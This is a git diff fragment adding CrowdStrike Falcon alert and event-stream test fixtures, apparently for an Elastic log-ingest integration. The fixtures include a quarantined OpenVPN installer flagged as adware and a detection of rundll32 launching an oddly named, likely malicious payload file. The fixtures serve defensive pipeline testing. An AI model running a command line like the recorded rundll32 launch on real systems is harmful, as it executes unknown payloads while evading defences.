"bootup_safeguard_enabled": false, + "critical_process_disabled": false, + "detect": false, + "fs_operation_blocked": false, + "handle_operation_downgraded": false, + "inddet_mask": false, + "indicator": false, + "kill_action_failed": false, + "kill_parent": false, + "kill_process": false, + "kill_subprocess": false, + "operation_blocked": false, + "policy_disabled": false, + "process_blocked": true, + "quarantine_file": true, + "quarantine_machine": false, + "registry_operation_blocked": false, + "rooting": false, + "sensor_only": false, + "suspend_parent": false, + "suspend_process": false + }, + "pattern_id": "5761", + "platform": "Windows", + "poly_id": "AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time": "2023-11-03T18:00:21.000Z", + "process_id": "399748687993", + "process_start_time": "2023-11-03T18:00:13.000Z", + "product": "epp", + "quarantined_files": [ + { + "filename": "\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state": "quarantined" + } + ], + "scenario": "NGAV", + "severity": 30, + "sha1": "0000000000000000000000000000000000000000", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui": true, + "source_products": [ + "FalconInsight" + ], + "source_vendors": [ + "CrowdStrike" + ], + "status": "new", + "tactic": "MachineLearning", + "tactic_id": "CSTA0004", + "technique": "Adware/PUP", + "technique_id": "CST0000", + "timestamp": "2023-11-03T18:00:22.328Z", + "tree_id": "1931778", + "tree_root": "38687993", + "triggering_process_graph_id": "pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type": "ldt", + "updated_timestamp": "2023-11-03T19:00:23.985Z", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + } + }, + "data_stream": { + "dataset": "crowdstrike.alert", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "2ce412d17b334ad4adc8c1c54dbfec4b" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "dataset": "crowdstrike.alert", + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ingested": "2024-02-21T09:17:46Z", + "kind": "alert", + "original": "{\"agent_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"aggregate_id\":\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"alleged_filetype\":\"exe\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"cloud_indicator\":\"false\",\"cmdline\":\"\\\"C:\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\\\"\",\"composite_id\":\"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"confidence\":10,\"context_timestamp\":\"2023-11-03T18:00:31Z\",\"control_graph_id\":\"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778\",\"crawl_edge_ids\":{\"Sensor\":[\"KZcZ=__;K\\u0026cmqQ]Z=W,QK4W.9(rBfs\\\\gfmjTblqI^F-_oNnAWQ\\u0026-o0:dR/\\u003e\\u003e2J\\u003cd2T/ji6R\\u0026RIHe-tZSkP*q?HW;:leq.:kk)\\u003eIVMD36[+=kiQDRm.bB?;d\\\"V0JaQlaltC59Iq6nM?6`\\u003eZAs+LbOJ9p9A;9'WV9^H3XEMs8N\",\"KZcZA__;?\\\"cmott@m_k)MSZ^+C?.cg\\u003cLga#0@71X07*LY2teE56*16pL[=!bjF7g@0jOQE'jT6RX_F@sr#RP-U/d[#nm9A,A,W%cl/T@\\u003cW`alY1K_h%QDBBF;_e7S!!*'!\",\"KZd)iK2;s\\\\ckQl_P*d=Mo?^a7/JKc\\\\*L48169!7I5;0\\\\\\u003cH^hNG\\\"ZQ3#U3\\\"eo\\u003c\\u003e92t[f!\\u003e*b9WLY@H!V0N,BJsNSTD:?/+fY';e\\u003cOHh9AmlT?5\\u003cgGqK:*L99kat+P)eZ$HR\\\"Ql@Q!!!$!rr\",\"N6=Ks_B9Bncmur)?\\\\[fV$k/N5;:6@aB$P;R$2XAaPJ?E\\u003cG5,UfaP')8#2AY4ff+q?T?b0/RBi-YAeGmb\\u003c6Bqp[DZh#I(jObGkjJJaMf\\\\:#mb;BM\\\\L[g!\\\\F*M!!*'!\",\"N6B%O`'=_7d#%u\\u0026d[+LTNDs\\u003c3307?8n=GrFI:4YYGCL,cIt-Tuj!\\u0026\\u003c6:3RbC`uNjL#gW\\u0026=)E`4^/'fp*.bFX@p_$,R6.\\\"=lV*T*5Vf`c.:nkd$+YD:DJ,Ls0[sArC')K%YTc$:@kUQW5s8N\",\"N6B%s!\\\\k)ed$F6\\u003ea%iM\\\"\\u003cFTSe/eH8M:\\u003c9gf;$$.b??kpC*99aX!Lq:g6:Q3@Ga4Zrb@MaMa]L'YAt$IFBu])\\\"H^sF$r7gDPf6\\u0026CHpVKO3\\u003cDgK9,Y/e@V\\\"b\\u0026m!\\u003c\\u003c'\",\"N6CU\\u0026`%VT\\\"d$=67=h\\\\I)/BJH:8-lS!.%\\\\-!$1@bAhtVO?q4]9'9'haE4N0*-0Uh'-'f',YW3]T=jL3D#N=fJi]Pp-bWej+R9q[%h[p]p26NK8q3b50k9G:.\\u0026eM\\u003cQer\\u003e__\\\"59K'R?_=`'`rK/'hA\\\"r+L5i-*Ut5PI!!*'!\",\"N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A\\u0026FE;(naXB4h/OG\\\"%MDAR=fo41Z]rXc\\\"J-\\\\\\u0026\\u0026V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr\",\"N6CUF__;K!d$:\\\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\\\"X'\\\\AtNML2_C__7ic6,8Dc[F\\u003c0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##\\u0026$^81(P+hN*-#rf/cUs)Wb\\\"\\u003c_/?I'[##WMh'H[Rcl+!!\\u003c\\u003c'\",\"N6L[G__;K!d\\\"qhT7k?[D\\\"Bk:5s%+=\\u003e#DM0j$_\\u003cr/JG0TCEQ!Ug(be3)\\u0026R2JnX+RSqorgC-NCjf6XATBWX(5\\u003cL1J1DV\\u003e44ZjO9q*d!YLuHhkq!3\\u003e3tpi\\u003eOPYZp9]5f1#/AlRZL06`/I6cl\\\"d.\\u0026=To@9kS!prs8N\"]},\"crawl_vertex_ids\":{\"Sensor\":[\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993\",\"quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\"]},\"crawled_timestamp\":\"2023-11-03T19:00:23.985020992Z\",\"created_timestamp\":\"2023-11-03T18:01:23.995794943Z\",\"data_domains\":[\"Endpoint\"],\"description\":\"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.\",\"device\":{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-10-12T03:45:57.753Z\",\"agent_version\":\"7.04.17605.0\",\"bios_manufacturer\":\"ABC\",\"bios_version\":\"F8CN42WW(V2.05)\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"config_id_base\":\"65994763\",\"config_id_build\":\"17605\",\"config_id_platform\":\"3\",\"device_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"external_ip\":\"81.2.69.142\",\"first_seen\":\"2023-04-07T09:36:36Z\",\"groups\":[\"18704e21288243b58e4c76266d38caaf\"],\"hostinfo\":{\"active_directory_dn_display\":[\"WinComputers\",\"WinComputers\\\\ABC\"],\"domain\":\"ABC.LOCAL\"},\"hostname\":\"ABC709-1175\",\"last_seen\":\"2023-11-03T17:51:42Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"ab-21-48-61-05-b2\",\"machine_domain\":\"ABC.LOCAL\",\"major_version\":\"10\",\"minor_version\":\"0\",\"modified_timestamp\":\"2023-11-03T17:53:43Z\",\"os_version\":\"Windows11\",\"ou\":[\"ABC\",\"WinComputers\"],\"platform_id\":\"0\",\"platform_name\":\"Windows\",\"pod_labels\":null,\"product_type\":\"1\",\"product_type_desc\":\"Workstation\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"LENOVO\",\"system_product_name\":\"20VE\"},\"falcon_host_link\":\"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"filename\":\"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"grandparent_details\":{\"cmdline\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"filename\":\"userinit.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\userinit.exe\",\"local_process_id\":\"4328\",\"md5\":\"b07f77fd3f9828b2c9d61f8a36609741\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135\",\"process_id\":\"392734873135\",\"sha256\":\"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"timestamp\":\"2023-10-30T16:49:19Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"yuvraj.mahajan\"},\"has_script_or_module_ioc\":\"true\",\"id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"indicator_id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"ioc_context\":[{\"ioc_description\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"ioc_source\":\"library_load\",\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"type\":\"module\"}],\"ioc_values\":[],\"is_synthetic_quarantine_disposition\":true,\"local_process_id\":\"17076\",\"logon_domain\":\"ABSYS\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"name\":\"PrewittPupAdwareSensorDetect-Lowest\",\"objective\":\"FalconDetectionMethod\",\"parent_details\":{\"cmdline\":\"C:\\\\WINDOWS\\\\Explorer.EXE\",\"filename\":\"explorer.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\explorer.exe\",\"local_process_id\":\"1040\",\"md5\":\"8cc3fcdd7d52d2d5221303c213e044ae\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"process_id\":\"392736520876\",\"sha256\":\"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"timestamp\":\"2023-11-03T18:00:32Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"},\"parent_process_id\":\"392736520876\",\"pattern_disposition\":2176,\"pattern_disposition_description\":\"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.\",\"pattern_disposition_details\":{\"blocking_unsupported_or_disabled\":false,\"bootup_safeguard_enabled\":false,\"critical_process_disabled\":false,\"detect\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"inddet_mask\":false,\"indicator\":false,\"kill_action_failed\":false,\"kill_parent\":false,\"kill_process\":false,\"kill_subprocess\":false,\"operation_blocked\":false,\"policy_disabled\":false,\"process_blocked\":true,\"quarantine_file\":true,\"quarantine_machine\":false,\"registry_operation_blocked\":false,\"rooting\":false,\"sensor_only\":false,\"suspend_parent\":false,\"suspend_process\":false},\"pattern_id\":5761,\"platform\":\"Windows\",\"poly_id\":\"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==\",\"process_end_time\":\"1699034421\",\"process_id\":\"399748687993\",\"process_start_time\":\"1699034413\",\"product\":\"epp\",\"quarantined_files\":[{\"filename\":\"\\\\Device\\\\Volume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"id\":\"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"state\":\"quarantined\"}],\"scenario\":\"NGAV\",\"severity\":30,\"sha1\":\"0000000000000000000000000000000000000000\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"show_in_ui\":true,\"source_products\":[\"FalconInsight\"],\"source_vendors\":[\"CrowdStrike\"],\"status\":\"new\",\"tactic\":\"MachineLearning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Adware/PUP\",\"technique_id\":\"CST0000\",\"timestamp\":\"2023-11-03T18:00:22.328Z\",\"tree_id\":\"1931778\",\"tree_root\":\"38687993\",\"triggering_process_graph_id\":\"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993\",\"type\":\"ldt\",\"updated_timestamp\":\"2023-11-03T19:00:23.985007341Z\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"}", + "severity": 30 + }, + "file": { + "name": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "path": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe" + }, + "host": { + "domain": "ABC.LOCAL", + "hostname": "ABC709-1175", + "ip": [ + "81.2.69.142" + ], + "mac": [ + "AB-21-48-61-05-B2" + ], + "os": { + "full": "Windows11", + "platform": "Windows" + } + }, + "input": { + "type": "cel" + }, + "message": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "process": { + "end": "2023-11-03T18:00:21.000Z", + "parent": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "hash": { + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4" + }, + "pid": 392736520876 + }, + "pid": 399748687993, + "start": "2023-11-03T18:00:13.000Z", + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + }, + "related": { + "hash": [ + "ABC709-1175", + "b07f77fd3f9828b2c9d61f8a36609741", + "cdf9cfebb400ce89d5b6032bfcdc693b", + "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "8cc3fcdd7d52d2d5221303c213e044ae", + "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "0000000000000000000000000000000000000000" + ], + "hosts": [ + "ABC.LOCAL" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "S-1-5-21-1909377054-3469629671-4104191496-4425", + "yuvraj.mahajan", + "mohit.jha" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-alert" + ], + "threat": { + "tactic": { + "id": [ + "TA0004" + ], + "name": [ + "MachineLearning" + ] + }, + "technique": { + "id": [ + "T0000" + ], + "name": [ + "Adware/PUP" + ] + } + }, + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log new file mode 100644 index 00000000000..488a5ee18b2 --- /dev/null +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log @@ -0,0 +1,9 @@ +{"metadata":{"customerIDString":"abcabcabc22222","offset":8693900,"eventType":"FirewallMatchEvent","eventCreationTime":1698921571000,"version":"1.0"},"event":{"DeviceId":"6734ff444f4456","CustomerId":"abcabcabc22222","Ipv":"ipv4","CommandLine":"System","ConnectionDirection":"1","EventType":"FirewallRuleIP4Matched","Flags":{"Audit":false,"Log":true,"Monitor":true},"HostName":"INPUNEDITCLP229","ICMPCode":"","ICMPType":"","ImageFileName":"System","LocalAddress":"81.2.69.142","LocalPort":"445","MatchCount":1,"MatchCountSinceLastReport":1,"NetworkProfile":"2","PID":"11111111","PolicyName":"PROD-FW-Workstations-Office-20201001","PolicyID":"3ec266b28bef471f9fd990e4f39ac829","Protocol":"6","RemoteAddress":"81.2.69.142","RemotePort":"53452","RuleAction":"2","RuleDescription":"","RuleFamilyID":"11111111aaaaaaaa","RuleGroupName":"SMBRules","RuleName":"InboundSMBBlock\u0026LogPrivate","RuleId":"4877172638743447345","Status":"","Timestamp":"2023-11-02T10:39:29Z","TreeID":"","Platform":"windows"}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8693906,"eventType":"IdpDetectionSummaryEvent","eventCreationTime":1698921607000,"version":"1.0"},"event":{"ContextTimeStamp":133433951380000000,"DetectId":"abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222","DetectName":"Unusual login to an endpoint","DetectDescription":"A user logged into a machine for the first time","FalconHostLink":"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222?_cid=abcabcabc22222","StartTime":133433949600000000,"EndTime":133433949600000000,"Severity":34,"SeverityName":"Low","Tactic":"InitialAccess","Technique":"ValidAccounts","Objective":"Gain Access","SourceAccountDomain":"NA.AAA.ABC.com","SourceAccountName":"abc.service","SourceAccountUpn":"admin.service@example.com","SourceAccountObjectSid":"S-1-S-1-S-1-1111-1844237615-1801674531-175881","SourceEndpointAccountObjectGuid":"C078A5DA-E13B-4418-AA28-802EF8C16210","SourceEndpointAccountObjectSid":"S-1-S-1-S-1-1111-1844237615-1801674531-316681","SourceEndpointHostName":"nope122.na.net.ABC.com","SourceEndpointIpAddress":"81.2.69.142","SourceEndpointSensorId":"a2f1de586958434eb5e14e30214e17ed","ActivityId":"76CC8396-7148-4CEB-84CB-08FAFE4FAC37","PatternId":51135,"SourceVendors":"CrowdStrike","SourceProducts":"FalconIdentityProtection","DataDomains":"Identity"}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8694126,"eventType":"IdentityProtectionEvent","eventCreationTime":1698923523065,"version":"1.0"},"event":{"IncidentType":"Unusuallogintoanendpoint","IncidentDescription":"Unusuallogintoanendpoint","Severity":4,"SeverityName":"LOW","StartTime":1698923340000,"EndTime":1698923340000,"IdentityProtectionIncidentId":"7a79b2de-4e10-41fb-818f-2bdf53c1625a","UserName":"NA.NET.ABC.com\\abc.service","EndpointName":"itreg1d3wp8vh3.eu.net.ABC.com","EndpointIp":"","Category":"Detections","NumbersOfAlerts":1,"NumberOfCompromisedEntities":2,"State":"NEW","FalconHostLink":"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:7A79B2DE-4E10-41FB-818F-2BDF53C1625A"}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8694676,"eventType":"AuthActivityAuditEvent","eventCreationTime":1698927699286,"version":"1.0"},"event":{"UserId":"admin.rose@example.com","UserIp":"81.2.69.144","OperationName":"saml2Assert","ServiceName":"CrowdstrikeAuthentication","Success":true,"UTCTimestamp":1698927699,"AuditKeyValues":[{"Key":"target_user","ValueString":"admin.rose@example.com"},{"Key":"trace_id","ValueString":"19169200-76c5-4861-92f1-355d0a908f40"},{"Key":"saml_envelope","ValueString":"SampleValue"},{"Key":"saml_assertion","ValueString":"sampleassertion"},{"Key":"app_id","ValueString":"fa8e047e-2e60-4837-b987-c57020947cd6"},{"Key":"actor_user","ValueString":"admin.rose@example.com"},{"Key":"actor_user_uuid","ValueString":"8940ddf0-bc3c-480b-a05a-bb94ff5dc0fb"},{"Key":"actor_cid","ValueString":"abcabcabc22222"}],"Attributes":{"actor_cid":"abcabcabc22222","actor_user":"admin.rose@example.com","actor_user_uuid":"00000000-aaaa-480b-a05a-bb94ff5dc0fb","app_id":"aaaaaaaa-2e60-4837-b987-c57020947cd6","saml_assertion":"saml_assertion_sample","target_user":"admin.rose@example.com","trace_id":"000000-76c5-4861-92f1-355d0a908f40"}}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8694733,"eventType":"UserActivityAuditEvent","eventCreationTime":1698928127000,"version":"1.0"},"event":{"UserId":"admin.rose@example.com","UserIp":"81.2.69.144","OperationName":"reveal_token","ServiceName":"sensor_update_policy","AuditKeyValues":[{"Key":"device_id","ValueString":"abcancancbanjjagjaj"},{"Key":"seedID","ValueString":"101"},{"Key":"message","ValueString":"Removeduplicatesensor."}],"UTCTimestamp":1698928127,"Attributes":{"device_id":"afjafanfafasfjaf","message":"Removeduplicatesensor.","seedID":"101"}}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8694992,"eventType":"ScheduledReportNotificationEvent","eventCreationTime":1698930172000,"version":"1.0"},"event":{"UserUUID":"9999999-bc3c-99bb-a05a-bb94ff5dc0fb","UserID":"admin.rose@example.com","ExecutionID":"efghtigh","ReportID":"999999ddddddddd","ReportName":"LarouxSearch","ReportType":"event_search","ReportFileReference":"/reports/entities/report-executions-download/v1?ids=eeeeeeeeeerrrrr444444","Status":1,"StatusMessage":"message","ExecutionMetadata":{"ExecutionStart":1698930019000,"ExecutionDuration":152176,"ReportFileName":"Laroux_Search_2023_November_2_13017_34176.csv","ResultCount":0,"ResultID":"fffffzdlIiwiY3VzdG9tZXJfYXBwIjoiZWFtIiwic2lnbmF0dXJlX3BvcnRpb24iOiIzYWRhOTZiNDA4MTkxNTFhZmIxYjFkOTM2MWZhMmE1NjBmNGNkMzc0ODQxNTY4MDlkYzhmNDRkMmRkZDY1NzdlIn0=","SearchWindowStart":1698843600000,"SearchWindowEnd":1698930000000}}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8695284,"eventType":"RemoteResponseSessionStartEvent","eventCreationTime":1698932494000,"version":"1.0"},"event":{"SessionId":"1111-fffff-4bb4-99c1-74c13cfc3e5a","HostnameField":"UKCHUDL00206","UserName":"admin.rose@example.com","StartTimestamp":1698932494,"AgentIdString":"fffffffff33333"}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8695332,"eventType":"DetectionSummaryEvent","eventCreationTime":1698932615000,"version":"1.0"},"event":{"ProcessStartTime":1698932614,"ProcessEndTime":1698932614,"ProcessId":54665651,"ParentProcessId":540396081,"ComputerName":"INNOIDL0032","UserName":"vishnu.sharma","DetectName":"AttackerMethodology","DetectDescription":"Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.","Severity":4,"SeverityName":"High","FileName":"rundll32.exe","FilePath":"\\Device\\HarddiskVolume4\\Windows\\System32","CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh","SHA256String":"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e","MD5String":"a52bfa4a96f97c368312028dbd7c8461","SHA1String":"0000000000000000000000000000000000000000","MachineDomain":"AP","FalconHostLink":"https://falcon.crowdstrike.com/activity/detections/detail/6902738b2a374a718cd9a45085baaf50/2246270721205?_cid=gffffffffy3zjobdz7ewb4xjqyjsy5a","SensorId":"69027ffffffffffffaaf50","IOCType":"hash_sha256","IOCValue":"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e","DetectId":"ldt:690ddddddd0721205","LocalIP":"81.2.69.144","MACAddress":"02-50-41-00-00-01","Tactic":"DefenseEvasion","Technique":"Rundll32","Objective":"KeepAccess","PatternDispositionDescription":"Prevention,processwasblockedfromexecution.","PatternDispositionValue":2048,"PatternDispositionFlags":{"Indicator":false,"Detect":false,"InddetMask":false,"SensorOnly":false,"Rooting":false,"KillProcess":false,"KillSubProcess":false,"QuarantineMachine":false,"QuarantineFile":false,"PolicyDisabled":false,"KillParent":false,"OperationBlocked":false,"ProcessBlocked":true,"RegistryOperationBlocked":false,"CriticalProcessDisabled":false,"BootupSafeguardEnabled":false,"FsOperationBlocked":false,"HandleOperationDowngraded":false,"KillActionFailed":false,"BlockingUnsupportedOrDisabled":false,"SuspendProcess":false,"SuspendParent":false},"ParentImageFileName":"\\Device\\HarddiskVolume4\\Windows\\explorer.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","GrandparentImageFileName":"\\Device\\HarddiskVolume4\\Windows\\System32\\userinit.exe","GrandparentCommandLine":"C:\\Windows\\system32\\userinit.exe","HostGroups":"e2091491a28248eaae3ede9f217e03fc,e837d750b8ba400c953380da346e2b04,186c20383a98495cb0e0a7d5540f3aff,24d1f760fcdc46d992bb8f41d7dd897b,2b7bd0fede874baaa1afdea20f255632,a293aded9c4548469d0e853b7267cce5,adab9db4541040729e01d16211189a27,b75b27ce17244922bd0a862a712ea812","Tags":"SensorGroupingTags/USB_Storage_Exception","AssociatedFile":"\\Device\\HarddiskVolume4\\Windows\\System32\\rundll32.exe","PatternId":10186}} +{"metadata":{"customerIDString":"abcabcabc22222","offset":8698239,"eventType":"IncidentSummaryEvent","eventCreationTime":1698971797000,"version":"1.0"},"event":{"IncidentStartTime":1698971797,"IncidentEndTime":1698971797,"FalconHostLink":"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e?_cid=ggggffffhhhhjjjjj","State":"open","FineScore":6.1,"LateralMovement":0,"IncidentType":1,"IncidentID":"inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e","HostID":"4345454534534545"}} \ No newline at end of file diff --git 